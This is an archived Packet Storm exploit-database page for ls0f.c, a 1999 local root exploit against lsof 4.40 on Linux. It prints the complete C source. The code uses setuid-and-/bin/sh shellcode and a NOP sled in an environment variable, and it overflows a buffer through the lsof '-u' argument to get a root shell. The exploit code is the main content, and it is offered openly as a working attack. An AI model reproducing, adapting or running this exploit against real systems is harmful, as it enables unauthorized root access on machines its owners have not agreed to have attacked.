exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ls0f.c

ls0f.c
Posted Aug 17, 1999
Authored by Bind

lsof 4.40 exploit, local root compromise. 0.901 kb.

tags | exploit, local, root
SHA-256 | fd57d63feaa510208b2a6f6141f559fb4c170ddba15ac5de626e6a8d166543b5

ls0f.c

Change Mirror Download
/* 
* ls0f.c (c) 1999 Subterrain Security
* Written by bind - 1999
*
* Vulnerable: linux machines running lsof 4.40
*
* Cheers to xdr & cripto...
*/

#include <stdio.h>
#include <strings.h>

#define LSOF "/usr/sbin/lsof"

char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{ __asm__("movl %esp, %eax"); }

int main(int argc, char **argv)
{
char code[2000];
char ret[28];
int offset, i;
int len = strlen(shellcode);

if(argc > 1) offset = atoi(argv[1]);

for(i = 0;i <= 28;i += 4)
*(long *)&ret[i] = (unsigned long) get_sp() - offset;

memset(code, 0x90, 2000);
memcpy(code+(2000 - len), shellcode, len);

setenv("CODE", code, 1);
execl(LSOF,"lsof","-u",ret,NULL);
}
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close